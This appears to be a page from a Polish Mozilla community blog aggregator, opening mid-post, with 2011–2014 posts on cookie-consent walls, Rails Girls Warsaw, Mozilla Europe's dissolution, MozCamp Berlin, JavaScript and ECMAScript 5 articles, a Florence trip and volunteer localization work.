Nawet jeśli uznamy założenia, które poczyniłem (w przypadku przeglądarek internetowych, Flasha, ciasteczek, czy to, że użyłem statystyk wszystkich internautów do przedstawienia problemu dotyczącego osób, za które są odprowadzane składki ZUS), za niewłaściwe, a moje obliczenia za błędne, to i tak odsetek osób, które nie mogą korzystać (wg ZUS-u) z tego portalu jest ogromna.

Hubert Gajewski, 16 stycznia 2014, 00:12

3 maja 2013

Hubert Gajewski Online

Ciasteczkowa zaraza się szerzy, Stooq jest ciężko chory

Wszyscy słyszeli już o dyrektywie Unii Europejskiej odnośnie cookies. Ciężko nie zauważyć tych durnych komunikatów o ciasteczkach, które rozprzestrzeniły się po sieci. Nie będę pisał o chorym prawie, bardziej przeraża mnie jego implementacja. Niektórzy pokazują informację raz, która po odświeżeniu strony znika, inni wyświetlają ją za każdym razem, aż ktoś nie zaakceptuje warunków, jeszcze inni zasłaniają treść.

Miałem tego dość – odkurzyłem nieużywany Adblock Plus i dodałem reguły wycinające to cholerstwo. Dzięki temu strony internetowe znów zaczęły wyglądać, jak za starych dobrych czasów. Do czasu.

Wszedłem dziś na Stooq.pl po dłuższej przerwie i moim oczom ukazało się coś takiego:

Tekst na całą stronę: Serwis Stooq używa plików cookies (identyfikator i konfiguracja użytkownika, sesje, statystyka, obsługa emisji reklam).  W celu korzystania z serwisu wymagana jest zgoda na zapis plików cookies na Twoim komputerze lub innym urządzeniu.  Wyrażam zgodę na zapis plików cookies  (wymaga włączenia obsługi plików cookies w przeglądarce)  dowiedz się więcej o plikach cookies  (Dyrektywa Unii Europejskiej 2009/136/WE)

Nie da się tego obejść – każdorazowa próba wejścia na stronę kończy się przekierowaniem na powyższą stronę.

Drogie Stooq.pl, zgodę wyraziłem tutaj (no może z wyjątkiem reklam z zewnętrznych serwisów):

Firefox - Preferencje, panel Prywatność, opcja Akceptuj ciasteczka zaznaczona, opcja Akceptuj ciasteczka z witryn inne niż odwiedzane - niezaznaczona

Czas poszukać innego serwisu, podobnego do Stooq.pl. Ze smaczniejszymi ciastkami.

Hubert Gajewski, 3 maja 2013, 20:53

19 kwietnia 2013

Luna w pełni

Rails Girls Warsaw

Śniegi powoli topnieją i wiosna nieśmiało nastaje, więc zamiast siedzieć w domu i się uczyć, jeżdżę sobie po naszym pięknym kraju na okołoinformatyczne imprezy. Najpierw pojechałam do Krakowa na copółroczne spotkanie zespołu Aviary.pl, o którym za dużo pisać nie chcę, bo i tak na pewno lepiej streści je Hubert, ale na którym sporo usłyszałam o Firefox OS (w Polsce już tego lata!). Tydzień później, w ubiegły weekend, pojechałam na trochę inną imprezę: Rails Girls w Warszawie, czyli dwudniowe warsztaty z programowania w Ruby on Rails przeznaczone dla dziewczyn, które programować by chciały, ale nie wiedzą, gdzie zacząć.

<3
Nie byłam pewna, czego się spodziewać po Rails Girls. Nigdy wcześniej nie byłam na imprezie stworzonej z myślą o kształceniu konkretnie kobiet. Już od wejścia czuć było, że jest to informatyczna impreza dla dziewczyn: na plakatach były pikselowe serduszka. Na oknach obok routerów stały wazony z kwiatami. Obok stołów leżały przedłużacze, a na stołach obok laptopów - kwiaty w doniczkach, które służyły też za identyfikator, dzięki któremu uczestniczki znajdowały swoją grupę do pracy. Dodajmy do tego bardzo miłe uczestniczki i instruktorów, a dostaniemy idealną kombinację przemiłej atmosfery z produktywnością. W końcu trudno było mi w takim otoczeniu nie czuć entuzjazmu.

Oczywiście ktoś może sobie kwestionować sensowność robienia warsztatów tylko dla kobiet, bo jaka to walka z seksizmem, skoro chłopakom wstęp wzbroniony. To rozmowa, którą warto odłożyć na inną okazję. Powiem tylko, że taka forma zachęty dziewczyn do zajęcia się czymś stereotypowo niedziewczęcym jest super. Rails Girls było spokojne i przyjazne. Czułam, że nic nikomu nie muszę tam udowadniać, dzięki czemu bardzo szybko przestałam się martwić, że czegoś nie umiem i nie jestem dość dobra, żeby tam być, a zaczęłam zadawać pytania, dzięki którym wyniosłam z tego weekendu trochę konkretnej wiedzy.

Mam też ładne naklejki.
Jeśli chodzi o sam przebieg warsztatów, był raczej wyważony. Opierał się głównie na pracy nad tutorialami Ruby (i Railsów) w małych grupkach: intruktor(ka) + 3 uczestniczki. Praca w grupach przerywana była krótkimi wystąpieniami różnych osób, które mówiły o programowaniu, początkach, dalszej nauce i byciu informatyczką/programistką. Przez dwa dni nie dało się zrobić za dużo. Nie stworzyłyśmy może autorskiej aplikacji, ale zrozumiałyśmy jak to wszystko działa na tyle, by wiedzieć jak się za jej stworzenie zabrać po zakończeniu warsztatów (a przynajmniej taką mam nadzieję - weryfikacja praktyką jeszcze przede mną). Od dawna myślałam nad tym, żeby spróbować programować. Teraz już wiem od czego zacząć.
Brakuje mi miejsc na plakaty na ścianach.

Zapisy na najbliższe warsztaty Rails Girls w Polsce, tym razem w Krakowie, są już niestety zamknięte, ale dziewczynom, które chciałyby spróbować sił w programowaniu, serdecznie polecam przyglądanie się kolejnym datom. Podobne warsztaty były też we Wrocławiu. Żałuję tylko, że w Gdańsku ich brak.
Luna, 19 kwietnia 2013, 19:42

16 listopada 2012

polski – stream of bytes

Wymyślanie Sieci na nowo

poniższy post jest tłumaczeniem postu Mitchell Baker “Reinventing the Web

W zaledwie 20 lat Sieć stała się jedną z najważniejszych infrastruktur współczesnego życia. Dziś dostrzegamy szansę, by Sieć, przez kolejny skok, stała się jeszcze bardziej użyteczna, przyjemniejsza, by otworzyła nowe szanse przed biznesem i mogła lepiej służyć celom społecznym.

Wyobraź sobie bogactwo i wolności Sieci płynnie zintegrowane w urządzeniach mobilnych. Wyobraź sobie, że to wszystko działa i to działa niezależnie od tego czy używasz aplikacji do specjalnego celu czy przeglądarki by odkryć swoją własną drogę.

Wyobraź sobie, że pobierasz aplikację i ona działa na wielu urządzeniach, niezależnie od jakich producentów pochodzą. Wyobraź sobie, że możesz wybrać czy chcesz kontaktować się z dostawcą aplikacji bezpośrednio czy przez Apple, Google albo Microsoft.

Wyobraź sobie, że masz wybór tego kto kontroluje Twoją tożsamość. Logujesz się na stronę i wszystko co zrobiłeś w sieci staje się dostępne dla świata? A może logujesz się i tylko to co Ty uznasz za publiczne staje się dostępne dla świata?

Wyobraź sobie poczucie bezpieczeństwa kiedy jesteś online – kto cię śledzi, kto sprzedaje informacje o tobie, kto cię chroni i jak możesz ochronić siebie sam.

Wyobraź sobie, że rozumiesz Sieć, poczucie kompetencji by robić rzeczy, by zmieniać te które istnieją i tworzyć kolejne, które spełniają twoje potrzeby. Wyobraź sobie, że uczenie się Sieci jest fajne i wykracza poza świat programistów obejmując zwykłych ludzi.

Mozilla tworzy ten świat. Mamy jego wizję, architekturę, technologie i plany produktów. Te produkty tworzymy właśnie teraz. Mamy zasoby finansowe, by zrealizować te cele. To ekscytujący i bardzo produktywny okres. Spójrz w nasz raport roczny, aby zobaczyć co zrobiliśmy i co jest na horyzoncie. Dołącz do nas, by razem budować ten świat.

zbraniecki, 16 listopada 2012, 05:33

19 kwietnia 2012

marcoos.techblog

Nowe podejście do obiektów w ECMAScript 5. Deskryptory własności

W ostatnią sobotę w Sali Senatu Polsko-Japońskiej Wyższej Szkoły Technik Komputerowych w Warszawie odbył się barcamp meet.js, na którym przedstawiłem prezentację pod tytułem „JavaScript 1.8.5: Object.*. Nowe sposoby na obiekty w JavaScripcie 1.8.5 i ECMAScripcie 5”. Jeśli kogoś nie było, albo chciałby sobie przypomnieć, o czym była mowa, może obejrzeć sobie slajdy z mojej prezentacji. … Continue reading
marcoos, 19 kwietnia 2012, 17:36

Atrybut placeholder znacznika input w HTML5 i jego stylowanie

HTML5 wprowadza atrybut placeholder elementu input. Służy on do określenia tekstu wyświetlanego przez ten element, kiedy nie została wprowadzona do niego żadna wartość. Jest on obsługiwany przez silnik Gecko Firefoksa oraz WebKit (Safari, Chrome). Na przykład, jeśli chcemy, by niewypełnione pole służące do wprowadzenia adresu e-mail wyświetlało napis “Wpisz adres e-mail”, wystarczy nadać ten atrybut … Continue reading
marcoos, 19 kwietnia 2012, 17:32

26 stycznia 2012

polski – stream of bytes

Stanowisko Polskiej społeczności Mozilli w sprawie ACTA

Polska społeczność Mozilli opublikowała stanowisko w sprawie decyzji Rady Ministrów w sprawie podpisania umowy ACTA.

Zachęcamy do zapoznania się z naszymi wnioskami.

zbraniecki, 26 stycznia 2012, 11:03

21 listopada 2011

polski – stream of bytes

Mozilla Europe i Mozilla w Europie

Projekt Mozilla odnosi niesamowite sukcesy w Europie. Cele jakie postawiliśmy sobie, spisane w ramach Manifestu Mozilli, są bardzo dobrze odbierane w środowisku Internautów w Europie.

Dzięki temu Mozilla ma świetne wyniki udziału na rynku Europejskim, ogromną rzeszę osób uczestniczących w projekcie, świetne kontakty z innymi społecznościami internetowymi, silne społeczności lokalne i w efekcie mamy miejsce przy stole w trakcie ważnych debat dotyczących przyszłości Internetu.

Mało kto jednak wie, że ten sukces udało nam się osiągnąć korzystając z bardzo skomplikowanej struktury organizacyjnej – w rzeczywistości istnieją trzy organizacje które powstawały w różnych momentach w odpowiedzi na konkretne problemy jakie nasz projekt napotykał (mozilla.org, mozilla.com i mozilla-europe.org).

Peterv ustawia pierwszy hosting dla Mozilli Europe w 2003

W ciągu ostatnich lat społeczność Mozilli w Europie pracowała wymiennie z jedną z tych trzech organizacji co niepotrzebnie komplikowało sytuację i utrudniało synchronizację.

Jedną z nich, stricte europejską jest stowarzyszenie Mozilla Europe założone w 2004 roku przez grupę aktywistów Mozilli w czasach gdy Mozilla Foundation nie była w stanie operować efektywnie na terenie Europy i szukaliśmy własnych rozwiązań pozwalających nam organizować nasz projekt.

Przez ostatnie 7 lat Mozilla Europe opiekowała się większością aktywności projektu, organizowała spotkania, wspierała konferencje, uczestniczyła w rozwiązywaniu konfliktów w społecznościach, chroniła marki, współpracowałą z prasą i angażowała się we wspieranie rozwoju projektu w różnych regionach Europy.

Od lipca 2005 miałem zaszczyt uczestniczyć w pracach stowarzyszenia jako członek zarządu. Był to niesamowity czas i ogromna odpowiedzialność, ponieważ Mozilla Europe koordynowała tworzenie się struktur i społeczności w Europie, ale też szansa na wykorzystanie mojego doświadczenia i wiedzy z Polski w skali całego kontynentu.

Mozilla jes niezwykłym projektem, ponieważ od wielu lat już stanowimy tak unikalny byt, że nie mamy od kogo się uczyć. Wszystkie decyzje, struktury, modele pracy i rozwiązania jakie mają służyć realizacji naszej misji musimy albo wymyślać całkowicie od nowa, albo adaptować do swoich potrzeb te zaczerpnięte od innych projektów Internetowych, kreatywnych firm, fundacji non-profit, albo projektów Open Source.

Dotychczasowe decyzje i kierunki działań pozwoliły nam rosnąć i adaptować się do zmian na rynku Internetowym na tyle skutecznie, że dziś Mozilla ma większe możliwości realizowania swoich celów statutowych niż kiedykolwiek w przeszłości!

To zaś pozwala nam skupiać się na adaptowaniu i rozwijaniu samej struktury projektu, tak aby przenosić udane rozwiązania lokalne na poziom globalny. W efekcie powstał projekt “One Mozilla”, którego celem jest unifikacja projektu w ramach jednej organizacji globalnej – Mozilla Foundation.

W efekcie powoli i sukcesywnie staraliśmy się identyfikować działania jakie podejmuje stowarzyszenie Mozilla Europe i wdrażać je na skalę globalną w ramach całego projektu. Wiele inicjatyw które przez lata działy się tylko w Europie pod auspicjami Mozilli Europe staje się globalne jak funkcje reprezentantów Mozilli, wolontariuszy pełniących funkcje rzeczników prasowych, uczestnictwo w konferencjach, organizacja własnych spotań w ramach inicjatyw MozCamp, współpraca z agendami rządowymi zajmującymi się Internetem i tak dalej.

Taki model organizacji pozwala nam lepiej skalować nasze działania na cały świat i pomagać innym regionom korzystać z tego co powstało w Europie, a także ułatwia synchronizację i efektywność relacji między projektem a fundacją.

Efektem ubocznym była też powolna redukcja roli stowarzyszenia Mozilla Europe na rzecz globalnej Mozilla Foundation i ostatecznie zarząd Mozilli Europe przy współpracy z Mozilla Foundation podjął decyzję o rozwiązaniu tej pierwszej i przekazaniu wszystkich inicjatyw pod auspicja globalnej Mozilli Foundation.

Ten ruch jest czysto operacyjny, nie wpływa w żaden sposób na nasze cele, działania i prace. Mozilla Europe nie zatrudniała pracowników i zarząd jest przekonany, że ta decyzja nie powinna mieć żadnego wpływu na pracę projektu i naszych społeczności.

Prezes stowarzyszenia, Tristan Nitot, oraz członkowie zarządu z niżej podpisanym, będą nadal opiekować się działaniami Mozilli w Europie i traktujemy ten ruch jako czystą redukcję biurokracji a także okazję do przedyskutowania modelu organizacji naszego projektu w Europie.

Chcemy zaktywizować większą grupę lokalnych społeczności do pracy na poziomie całej Europy i uruchamiamy nowe inicjatywy pozwalające większej liczbie osób wpływać na losy Mozilli na poziomie całego kontynentu. Mamy nadzieję także na silniejszą reprezentację naszych działań w ramach projektu Drumbeat oraz licznych inicjatyw znanych z Mozilla Labs w Europie a także planujemy otworzyć kilka otwartych przestrzeni dla osób zainteresowanych pracą nad rozwojem Internetu w ramach projektu MozSpaces. Pierwsze powstaną w Londynie i Berlinie w 2012.

Byłem ogromnym zwolennikiem tego rozwiązania ponieważ widzę w nim szansę na lepszą adaptację naszych działań w Europie do dynamicznego rynku Interentowego oraz na zwiększenie aktywności samej Mozilla Foundation na poziomie globalnym w Europie, Azji, Afryce czy Ameryce Południowej.

Europa jest przykładem i inspiracją dla społeczności Mozilli na całym świecie i wierzymy, że nasze globalne struktury są dziś wystarczająco silne, aby móc bezpośrednio angażować się i reagować na potrzeby lokalne. Sieciowa struktura naszego projektu dojrzała przez ostatnie lata i sprawia, że możemy dziś więcej niż kiedykolwiek przy mniejszym poziomie biurokracji.

Członkowie zarządu Mozilli Europe wraz z liderami społeczności lokalnych stworzą następny rozdział historii Mozilli w Europie i współpracując z Mozilla Foundation będziemy rozwijać projekt Mozilla reagując na potrzeby i wyzwania kolejnych lat.

zbraniecki, 21 listopada 2011, 16:09

20 listopada 2011

Luna w pełni

MozCamp w Berlinie okiem nooba

Tydzień temu skończył się MozCamp 2011 w Berlinie, jedno z najciekawszych wydarzeń, w jakich miałam przyjemność uczestniczyć w tym roku. Powinnam była opisać je wcześniej, żeby uchwycić opary pozostałego we mnie entuzjazmu, ale wszystko poszło na nadrabianie wywołanych tym wyjazdem zaległości na studiach. Nic to, lepiej późno niż wcale, zwłaszcza kiedy jest co opisywać.

MozCamp to organizowana co dwa lata w Europie (a od tego roku również w Azji) konferencja wolontariuszy i pracowników Mozilli, podczas której można poznać całą społeczność, omówić plany Mozilli na przyszłość i trochę popracować. Zupełnie przez przypadek można też nasiąknąć entuzjazmem do wszystkich przedsięwzięć organizacji i do swojej własnej pracy. Poważnie, entuzjazm wylewał się ze sceny wiadrami i gdybyśmy chcieli tam grać w zaproponowaną przez Falkę grę, prawdopodobnie nie opuścilibyśmy Berlina o własnych siłach. Bardzo przyjemnie się tego wszystkiego słuchało.

ENTUZJAZM! (Źródło)
Pojechałam tam jako lokalizatorka, więc siłą rzeczy byłam głównie na panelach poświęconych lokalizacji. Na szczęście udało mi się też pojawić na kilku spotkaniach poświęconych zagadnieniom wykraczającym poza dziedzinę, w której czuję się stosunkowo pewnie po tych kilku miesiącach współpracy z Aviary.pl (teraz też na Facebooku i Twitterze!). Ciekawie za to uczestniczyło mi się w kilku spotkaniach poświęconych angażowaniu nowych wolontariuszy i byciu przydatnym, jeśli nie posiada się żadnych umiejętności technicznych (czyli kiedy jest się mną, w sumie). A pomagać można na wiele sposobów.

Można testować różne rzeczy. Jest Aurora, jest Firefox Beta, jest daleki od doskonałości, choć zmierzający w optymistycznym kierunku Firefox na Androida (poważnie, demo interfejsu na tablety strasznie mi się spodobało). Mozilla nie robi tej przeglądarki dla siebie, a i sama nie jest w stanie wszystkiego sprawdzić, więc testerzy są przydatni.

Można pomagać przy lokalizacji mozillowych rzeczy. Oficjalny polski zespół tłumaczy Mozilli to Aviary.pl, które, niczym Gwardia Dumbledore'a, wciąż rekrutuje! Nie gryziemy, można z nami sobie pogadać na IRCu (irc.mozilla.org, kanał #aviarypl) i się przekonać. Ja szczerze, z całego serca, polecam wszystkim.

Można też po prostu głośno krzyczeć o Mozilli i o tym, co robi - zwłaszcza że robi świetne rzeczy. Jest organizacją non profit, jej działanie opiera się na wolontariacie, a jest odpowiedzialna za wyparcie z rynku giganta, jakim jest niezaprzeczalnie Microsoft. Nieustannie pracuje nad wydawanym przez siebie oprogramowaniem i mocno technicznie nadgania coraz bardziej popularne Google Chrome. Poza tym, Mozilla nie działa dla zysku, więc jest bardziej zainteresowana faktycznym dobrem użytkowników, ochroną ich prywatności i zapewnieniem im naprawdę otwartego Internetu i wolnego wyboru. Tutaj zaczynają się już trochę bardziej techniczne tematy które nie do końca ogarniam (jak webowe aplikacje), ale zaczynają się też tematy takich opcji w samej przeglądarce, jak informowanie witryn, że użytkownik nie chce być śledzony (w Firefoksie Opcje -> Prywatność), albo takich projektów, jak BrowserID, inicjatywa proponująca logowanie się na różnych stronach nie kontem Facebooka, a przeglądarką. W skrócie, Firefox pozornie oferuje to samo, co Chrome czy IE, ale Mozillą kierują fundamentalnie inne powody niż Google i Microsoft. Po prostu Mozilla to grupa ludzi, którzy robią to, co lubią, aby innym było w Sieci lepiej, i robią to bez chęci zysku, za to z ogromnym entuzjazmem. I ja to w Berlinie strasznie mocno czułam.

W zasadzie Mozilla po tym weekendzie wydaje mi się być grupą idealistów, którym się udało coś zmienić. Naprawdę strasznie mi się to podoba i strasznie się cieszę, że mogłam być w tym Berlinie, posłuchać tych ludzi, autentycznie przesiąknąć ich entuzjazmem i wyjechać stamtąd z przeświadczeniem, że jestem im przydatna. Niewiele weekendów w moim życiu było tak intensywnych, produktywnych i interesujących. W niedzielny wieczór, czekając na lotnisku w Kopenhadze na lot do Gdańska, z dala już od całego Mozillowego zamieszania, czułam fizyczne zmęczenie i byłam niezdolna do czegokolwiek bardziej wymagającego niż patrzenie się w przestrzeń z tępym, błogim uśmiechem na twarzy w oczekiwaniu na wezwanie na pokład samolotu. W poniedziałkowy poranek nie mogłam się doczekać dalszej pracy i jakoś tak mi zostało.

A tymczasem na deser moja ostatnio ulubiona strona internetowa: małe pandy czerwone na żywo z zoo w Tennessee. Tyle słodyczy!
Luna, 20 listopada 2011, 20:22

26 października 2011

marcoos.techblog

Mozilla Hacks: Funkcja calc() z CSS3 w Firefoksie 4

W tym odcinku tłumaczeń artykułów z Mozilla Hacks – notka Paula Rougeta o calc() w CSS. Zarówno oryginalny artykuł, jak i to tłumaczenie dostępne są na licencji Creative Commons – Attribution 3.0. Funkcja calc() z CSS3 w Firefoksie 4 Poniżej omówiona została funkcja calc() z CSS3. Firefox jej jeszcze nie obsługuje, ale trwają prace nad … Continue reading
marcoos, 26 października 2011, 08:25

Mozilla Hacks: ECMAScript 5 Strict Mode – tryb ścisły w ECMAScripcie 5

W tym odcinku tłumaczeń artykułów z Mozilla Hacks – notka Jeffa Waldena o trybie ścisłym w JavaScripcie. Jeff zajmuje się rozwojem SpiderMonkey, silnika JS Firefoksa. Zarówno oryginalny artykuł, jak i to tłumaczenie dostępne są na licencji Creative Commons – Attribution Share-Alike v3.0. ECMAScript 5 strict mode – tryb ścisły ES w Firefoksie 4 Programiści ze … Continue reading
marcoos, 26 października 2011, 08:25

Prosimy nie regulować odbiorników

Już wkrótce wrócę do częstszego blogowania, a tymczasem nieskromnie polecam wywiad, jaki w ramach cyklu “Ludzie Front-Endu” przeprowadził ze mną Damian Wielgosik – trochę o Aviary.pl i Mozilli, trochę o HTML5. :)
marcoos, 26 października 2011, 08:25

Nowe podejście do obiektów w ECMAScript 5. Ograniczanie możliwości modyfikacji obiektów

Ostatnio przypomniałem podstawy związane z obiektami w JavaScripcie i opisałem nowe sposoby na definiowanie własności obiektów. Dziś druga część nowości ES5 związanych z obiektem Object – zajmiemy się mrożeniem, pieczętowaniem i uniemożliwianiem rozszerzania obiektów. ECMAScript 5: Ograniczanie możliwości modyfikacji obiektów Mamy już zdefiniowane (w dotychczasowy sposób lub za pomocą defineProperty()) własności obiektu, ale chcielibyśmy uniemożliwić … Continue reading
marcoos, 26 października 2011, 08:25

ECMAScript 5: Object.create() i prototypy

Poniższa notka to obiecana trzecia część cyklu o nowym podejściu do obiektów w ES5, poświęcona tworzeniu obiektów. Od poprzednich dwóch części minęło trochę czasu, ale przecież lepiej późno niż wcale. Zaczynamy. W dwóch poprzednich odcinkach opisałem, w jaki sposób można ograniczać możliwości modyfikacji obiektów i jak tworzyć własności obiektów przy użyciu deskryptorów własności. W pierwszym … Continue reading
marcoos, 26 października 2011, 08:25

Konferencja Front Row 2011

20-21 października w Krakowie w hotelu Park Inn odbędzie się konferencja Front Row 2011. Swoje prezentacje przedstawią m. in. Patrick H. Lauke z Opery i Christian Heilmann z Mozilla Corporation, a także znane osobistości polskiego frontendu, jak Krzysztof Szafranek czy Michał Budzyński i inni. Pojawię się tam także ja, by opowiedzieć o ECMAScripcie „Harmony”, czyli … Continue reading
marcoos, 26 października 2011, 08:25

22 października 2011

marcoos.techblog

After Front Row 2011

At Front Row Conference this week I had the pleasure to speak about the new features coming to JavaScript with ECMAScript.next (slides) and to host the “Mozilla & the Open Web: How You Can Help” open space session that was meant to encourage you to contribute to the Mozilla Developer Network, experiment with upcoming HTML, … Continue reading
marcoos, 22 października 2011, 11:38

4 października 2011

Luna w pełni

We Florencji jak w domu (tylko lepiej)

Wróciłam z Florencji i tak naprawdę mogę o tym mieście powiedzieć tylko tyle, że każdy przed śmiercią powinien je odwiedzić. Dawno tak się nie zakochałam w żadnym miejscu (o ile kiedykolwiek się w jakimś miejscu tak zakochałam).

To wcale nie jedyny powód,
dla którego Florencja jest genialna
Podróż z Polski nie jest może specjalnie sprzyjająca, bo lotnisko we Florencji jest raczej niewielkie, ale mi z każdą minutą spędzoną na lotniskach i w samolocie mocniej biło serce, a kiedy przeleciałam nocą nad Alpami poprzecinanymi światłami tamtejszych miasteczek, byłam całkowicie gotowa na wkroczenie do innego świata. Na początku, rzeczywiście, lotnisko zupełnie mnie zaskoczyło, bo strzałki kierowały biednych podróżujących w zupełnie abstrakcyjne miejsca, ale kiedy tylko udało mi się złapać autobus w stronę centrum, całkowicie przepadłam.

Do Florencji przyjechałam nocą i pierwsze, co zauważyłam, to ludzie. Nocna weekendowa Florencja tętni życiem i kiedy to piszę, mam na myśli naprawdę nieprzebrane tłumy, równie liczne, jak za dnia. Wszyscy w tym tłumie wydają się być zadowoleni ze wszystkiego i bardzo przychylni światu, co szybko mi się udzieliło. Wąskie uliczki i jeszcze węższe chodniki sprawiają, że nikt nie przejmuje się tam takimi szczegółami, jak zasady ruchu drogowego, i ludzie chodzą środkiem ulicy, a samochody pomijają sobie podwójne ciągłe - i jakimś cudem udaje im się wszystkim nie zabić siebie nawzajem. Na każdym rogu stoją budki z lodami, restauracje i sklepy ogromnych modowych marek, a wszystko wygląda przytulnie. Od całego miasta bije przepych i ciepło, i nie ma to aż tak dużo wspólnego ze stale świecącym słońcem. Po kilku dniach czułam, jakbym we Florencji żyła od zawsze, a wyjazd to najgłupsza rzecz, jaką mogę zrobić.

Nie wiem, co to za uliczka,
ale gdzieś tu jedliśmy.
Poza tym - samo miasto. Mój pobyt we Florencji był trochę roboczy - byłam tam ma spotkaniu z zespołem z Aviary.pl, więc w sobotę i niedzielę trzeba było posiedzieć w zamknięciu, powymieniać się doświadczeniami z Mozillą Italia, omówić własne problemy i perspektywy, no i popracować. Ale codziennie, w trakcie poszukiwania miejsca na kolejny posiłek (co zajmowało nam codziennie chyba około godziny) i powrotów do siebie, widzieliśmy dość sporą część miasta, a cały poniedziałek poświęciliśmy już tylko na zapoznawanie się z nim. Co prawda Florencja jest pierwszym miejscem na świecie, gdzie nigdy nie wiedziałam, gdzie jestem i co chwilę kompletnie traciłam poczucie kierunku, ale w takim miejscu można się zgubić z radością. Zwłaszcza że, mimo całej obcości tego miasta, wszystko wydawało się znajome. Florencja jest magiczna. Gdzie się nie obejrzałam, byłam otoczona starymi, masywnymi budynkami i drewnianymi okiennicami. Na wąskich uliczkach i jeszcze węższych chodnikach czułam się jeszcze mniejsza niż zwykle i z jednej strony przytłoczona otaczającymi mnie domami, ale z drugiej strony - wszystkie te uliczki były niewiarygodnie przytulne. Aż miało się ochotę zostać na nich na zawsze.

A to tylko same okolice centrum, nie miejsca oblegane przez turystów. Uginający się od złota Ponte Vecchio, Galeria Uffizzi (którą, niestety, widzieliśmy tylko z zewnątrz), rezydencja Medyceuszów, czy górująca nad miastem kopuła katedry Santa Maria del Fiore wyłaniały się, ogromne, zza zakrętów tych wąskich uliczek, by zaskoczyć swoim ogromem. Żałowałam czasami, że nie ma we Florencji dość przestrzeni, żeby się cofnąć i ogarnąć wzrokiem te wielkie i wspaniałe budynki. Najwięcej miejsca znaleźliśmy na szczycie wzgórza, gdzie wspięliśmy się, żeby zobaczyć miasto z góry. Widok całkowicie wart trudu i panującego u góry morderczego skwaru. Żałuję, że nie widziałam więcej - na przykład pozamykanych w poniedziałki ogrodów. Zieleń to jedyne, czego mi we Florencji boleśnie brakowało. Na wąskich, magicznych uliczkach brak miejsca na trawę i drzewa.
Jedyny powód, żeby po takich lodach nie umierać ze szczęścia ,
to perspektywa kolacji w Quattro Leoni.

Poza tym, jedzenie. Boże, jedzenie. Podczas najlepszej kolacji w moim życiu, jeden z miejscowych Włochów powiedział nam, że ludzie, którzy chcą dobrze zjeść, jadą do Włoszech, ale ludzie, którzy chcą dobrze zjeść we Włoszech, jadą do Toskanii. I nie wyobrażam sobie, jakim cudem to miałaby być czcza przechwałka. Nigdzie na świecie nie jadłam tak nieprzyzwoicie dobrego jedzenia, jak we Florencji. Podają zupełnie absurdalne rzeczy, jak pastę z pomidorów i chleba, albo zapiekane w serowo-kremowym sosie makarony nafaszerowane gruszkami, albo krwiste kawałki mięsa, albo ser z miodem, albo ciasteczka z migdałami do maczania w kieliszku pomarańczowego wina - i każda następna potrawa jest lepsza od poprzedniej, aż do momentu, w którym mózg zwyczajnie nie wytrzymuje z przeładowania dobrocią i odmawia przyjęcia do wiadomości perspektywy jedzenia czegokolwiek, co nie pochodzi z Florencji (i okolic).

Przy wyjeździe czułam spory niedosyt. Perspektywa powrotu ze słonecznej Toskanii na deszczowe Pomorze nie była specjalnie zachęcająca. Florencję chciałabym przejść wzdłuż i wszerz ze trzy razy, wejść w te wszystkie miejsca i chłonąć te widoki, tę atmosferę i ten nastrój. Trzy dni to zdecydowanie za krótko, żeby nacieszyć sie wszystkim, co Florencja ma do zaoferowania, a i tak zaoferowała mi w tak krótkim czasie więcej, niż jestem w stanie tu opisać. Tymczasem pozostaje mi tylko planować w przyszłości powrót.

Przyjaźń z okazji MFKiG musi być w tym roku naprawdę wyśmienita, żeby w ogóle choć trochę przyćmić ten wyjazd. Nie mogę sie doczekać.
Luna, 4 października 2011, 08:44

10 maja 2011

polski – stream of bytes

Falsy Values – volunteer opportunity

In just about a week Warsaw will be hosting a major JavaScript event – Falsy Values.

Falsy Values is brought to you by the two people – Damian Wielgosik and Paweł Czerski – who made their way onto the Web Event Stage last year with their widely praised Front-Trends conference.

This year, they focus on hardcode JavaScript. This conference is not about soft disciplines, not about social science, it’s solely about hacking the modern Web.
With stellar workshops and talks, with names such as Douglas Crockford, Tantek Çelik, Tom Hughes-Croucher and our homegrown stars like Kornel “porneL” Lesiński, it has what it takes to be the powerful event to be at.

Now, such an event is not going to happen on its own, it takes passion, dedication and the one thing we all should value most – time – to shape it up and deliver.

One of the unique features of this conference is that it really is handmade by those two fellows who work 24/7 right now to plug all the cables in the right slots, bring supply to the tables and speakers to the microphone.

All hands on deck!

As you may have guessed from the title – we believe we could use some help during the event itself!

If you’re located in Warsaw, or if you will be here for the time of the event, and you’re looking for a chance to participate in what’s going to happen there, help us make it perfect, learn the unique lesson from behind the scenes, here’s your chance!

We’re looking for geeks who seek experience in helping us run this event. Several brave souls to support speakers, guide the crowd through the agenda, run fiercely to aid some brother in JavaScript arms who’s in danger of any kind (like – you know that moment when your WiFi doesn’t work?)

We expect you to be there with us (even an hour before the opening), assist when needed and enjoy the conference. We offer an opportunity to learn, gain experience and help us make the best event in the JavaScript world since Brendan invented this monster!

Get in touch with us! Email me (gandalf at mozilla dot org)  or contact Damian and Paweł directly and we’ll go from there. Hurry up, we only have 5-7 slots available!

zbraniecki, 10 maja 2011, 17:27

16 marca 2011

polski – stream of bytes

Web O’Wonder po polsku!

Pisałem niedawno o kampanii Web O’Wonder.

Niedługo po moim poście zgłosił się do nas Krzysiek Wróblewski i zaoferował swoją pomoc. Pomogliśmy mu założyć konto na Verbatimie, przygotowaliśmy stage, i prace ruszyły. Liderem lokalizacji był Krzysiek, pomagał mu Leszek “Teo” Życzkowski, a ja starałem się by ich praca napotykała jak najmniej przeszkód.

Krótki wywiad:

G: Jak dowiedzialeś się o projekcie i co sprawiło że się zgłosileś?
K: O projekcie dowiedziałem się oczywiście z Twojego bloga na Polskiej Planecie Mozilli. Zgłosiłem się, bo chciałem zobaczyć jak przebiega proces tłumaczenia i miałem trochę wolnego czasu 🙂

G: Jak Ci się pracowało przy nim?
K: Pracowało się bardzo dobrze, na początku musiałem opanować Verbatima, ale nie było to trudne, szczególnie z pomocą pana Leszka. Nie zdziwiło mnie za to, w jaki sposób Wasz zespół dyskutuje na temat najdrobniejszych szczegółów, bo z tego jesteście znani 😉

G: Co bylo najtrudniejsze?
K: Co było najtrudniejsze? Konieczność porzucenia takich ładnych czcionek na rzecz standardowych, z powodu niedostępności polskich znaków 😛

G: Ile czasu zajęło Ci to tłumaczenie?
K: tłumaczenie zajęło chyba z tydzień, co raczej nie jest mistrzostwem świata, ale nie żałuję poświęconego czasu 🙂

